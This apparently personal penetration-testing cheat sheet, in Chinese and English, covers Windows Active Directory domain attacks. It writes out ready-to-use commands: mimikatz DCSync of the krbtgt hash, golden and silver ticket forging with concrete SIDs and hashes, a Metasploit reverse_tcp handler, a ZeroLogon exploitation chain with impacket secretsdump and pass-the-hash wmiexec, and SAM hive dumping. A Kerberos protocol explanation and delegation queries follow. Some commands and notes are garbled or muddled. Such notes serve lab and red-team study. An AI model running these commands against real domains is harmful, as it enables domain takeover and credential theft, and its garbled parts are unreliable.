域内主机枚举 run windows/gather/enum_ad_computers
进程迁移 migrate winlogon.exe(id)
lsadump::dcsync /domain:ack123.com /user:krbtgt
获取sid和hash
lsadump::lsa /patch
黄金票据 golden ticket
#kerberos::golden /user:需要伪造的域管理员用户名 /domain:demo.com /sid:域sid /krbtgt: krbtgt用户的Hash /ticket:ticket.kirbi
kerberos::golden /user:16SERVER-DC1 /domain:ACK123.com /sid:S-1-5-21-2015848930-1301831522-615504165-1602 /krbtgt:fb979da43f63a991f8f5599add59e01c /ticket:ticket.kirbi
kerberos::purge //先清空所有票据
kerberos::ptt ticket.kirbi //再将生成的票据注入域用户主机
--------------------------------------------------------------------------------------------
白银票据 silver ticket
/domain 域的名称 /dis 域的sid /service 指定服务类型 /ticket(可选) 指定路径保存票据 /ptt 直接注入内存 /rc4 域控机器ntlm
kerberos::golden /user:test /domain:main.com /sid:S-1-5-21-2214894582-1205818508-3793940241 /target:dc.main.com /rc4:e72477885554476fbc116b63a21f36e2 /service:host /ptt
创建计划任务
schtasks /create /S dc.main.com /tn "task1" /RU "system" /sc weekly /tr "c:\windows\system32\calc.exe"
已知被设为非约束委派的服务的明文账户密码,即可通过此获取域管理员权限
构造服务账户的票据
tgt::ask /user:12server-data2 /domain:ack123.com /password:QWEasd.1122 /ticket:data2.kirbi
利用伪造的票据对域控发起申请访问域服务器CIFS服务的管理员权限的TGS的命令
Tgs::s4u /tgt:data2.kribi /user:administrator@ack123.com /service:service_to_access
钻石票据 diamond ticket
类似于金票,但是更加隐蔽和强大。 钻石票据允许攻击者伪造service ticket(TGS)。
特点:不需要伪造TGT,不需要与DC交互;可针对特定服务进行伪造,影响范围更小;对特定服务完全控制。
需具备条件:
1、域管理员权限;
2、kerberos服务票据密钥; --> lsadump:dcsync /user:krbtgt
3、清除目标服务的SPN(Service Principal Name)。
蓝宝石票据 sapphire ticket
域内的中继 ADCS relay
ZeroLogon(CVE-2020-1472)
---------------------------------------------------------------------------
msfconsole -qx "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.65.208; set LPORT 4444; run"
黄金票据得工作原理
用户请求身份验证服务,通过用户名和密码生成TGT
TGT由域控得KRBTGT账户签名并加密 ,用户凭借TGT向 “票据授予服务” 请求 “服务票据”,从而访问域内资源。
攻击方式
前提:拥有域控的管理员权限及以上
首先需要获取kbrtgt账户的哈希值
再手动生成TGT,冒充任意用户访问域内资源,包括域控。
域内横向
pass the hash
SYSVOL组策略获取密码
cve-2019-1040
MS14-068
cve-2020-1472 exploit process
置空密码:
proxychains python cve-2020-1472-exploit.py 16server-dc1 10.10.10.135
哈希获取:
proxychains impacket-secretsdump ack123.com/16server-dc1\$@10.10.10.135 -no-pass
wmi连接:
proxychains impacket-wmiexec aad3b435b51404eeaad3b435b51404ee:bc23a1506bd3c8d3a533680c516bab27 ack123.com/administrator@10.10.10.135
恢复原哈希:
导出sam:
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
lget system.save
lget sam.save
lget scurity.save
proxychains impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
proxychains python restorepassword.py 16server-dc1@16server-dc1 -target-ip 10.10.10.135 -hexpass 229625211ee8ef3ba31427eb53e97db75801ef2751d945cf050fe3282eb49d8a294f4b370ab30549b3b574286e6595ce305496751888660ba990b2b1963a01b04c88df5913df5f882eaeac5bf8e142489c24088cc32604f35361ba55304e9edd3cf9a9203bd1e48a131cb3cb07a02863e62db1ceac50416a794839e84634f703ba6961e6bf47e893fe0a28ffe68574529ade4a7dfe9bbdf3f7fff8638adf7836fd85b391a8a25ee33f00ab3cc369071bcbb93eba3f9dc97646b110a83a81867537bee814ae33875b6c3bc002f5202066a50129a0771013ff83d7615312b2d3b3b74be3e07ef6f998faedeba2d4c24ed6
CVE-2021-1675/CVE-2021-34527 PrintNightmare
How does kerberos works
kerberos is a authentication procotocol,it does validates to which resources or services can this user access
kerberos items:
Transport layer ,use UDP or TCP as transport protocol,which sends data in cleartext,kerberos responsible for provideing ecryption
agents,several agents work together to provide authentication in kerberos
client or user: who want to access to the services
AP(application Server) : which offers the service required by user
KDC(ket distribution center): the main service of kerberos,responsible of issuing the ticket,installed on the DC(Domain Controller),it supported by the AS(Authentication Services),which issues the TGTs.
Tickets
TGS(Ticket Granting Service) ,it is encrypted with the service key.
TGT(Ticket Granting Ticket),perente to the KDC to request for TGSs.It is encrypted with the KDC key.
Authentication Process
KRB_AS_REQ, sent the request to get TGT from KDC,KRB_AS_REQ has the following fileds:
A encrypted timestamp with client key
usernmae
The service SPN associated with krbtgt account
A Nonce generated by the user
KRB_AS_REP, after receiving the KRB_AS_REQ request,the KDC verfies the user identity by decrypting the timestamp.if the message is correct,then it must respond with a KRB_AS_REP.
KRB_AS_REP include the following informations :
usernmae
TGT
Some encrypted data with user key
KRB_TGS_REQ,in order to request a TGT, a KRB_TGS_REQ message must be send to KDC
KRB_TGS_REQ includes:
encrypted data with session key :
username,
timestamp
TGT
SPN
Nonce generated by user
KRB_TGS_REP,after receiving the KRB_TGS_REQ message, the KDC returns a TGS in KRB_TGS_REP.
KRB_TGS_REP includes:
username
TGS:
service session key,
username,
expiration date,
PAC
encrypted data with session key:
service session key,
expiration date,
Nonce
KRB_AP_REQ,if everythins went well,the user already has a valid TGT to intwract with the service.in order to use it, user must send to the AP a KRB_AP_REQ message.
KRB_AP_REQ includes:
TGS
encrypted data with service session key:
username,
timestamp
after that, if privileges right, user can access this service.
Attack
Overpass the hash / Pass the key
Pass The Ticket
Golden Ticket / Sliver Ticket
How to attack kerberos
ASREP Roast
Kerberoasting
Pass the key
Pass the ticket
Sliver ticket
Golden ticket
the first attacks only connectivity with the DC is required,the last attack requires a user being a Domain Administrator.
Delegation(委派)
将域内用户的权限委派给服务账户,使得服务账户能以用户权限开展域内活动,攻击者可通过利用委派攻击获取域管理员权限
1、非约束性委派(信任此计算机来委派任何服务)
这是最不安全的委派形式,允许服务账号在没有任何限制的情况下,以其他用户的身份访问域内的所有服务。攻击者一旦获得了一个配置了非约束性委派的服务账号,就可以假冒任何用户,甚至是高权限用户,去访问其他服务或资源。
查询非约束委派的主机账户:
AdFind.exe -b "DC=ack123,DC=com" -f "(&(samAccountType=805306369) (userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
Get-NetComputer -Unconstrained -Domain ack123.com
查询非约束委派的服务账户:
AdFind.exe -b "DC=ack123,DC=com" -f "(&(samAccountType=805306368) (userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
Get-NetUser -Unconstrained -Domain ack123.com | select name
2、约束性委派 (仅信任此用户作为指定服务的委派)
约束性委派限制了服务账号可以代表用户访问的服务范围。虽然这相比非约束性委派更为安全,但如果配置不当,攻击者仍然可以滥用该委派机制,假冒特定用户访问指定的服务。
3、基于资源的约束性委派
这是Windows中更为精细化的委派控制,允许资源(如服务器或服务)决定谁可以以其他用户的身份访问它。攻击者可能会尝试控制资源,借此进行权限提升。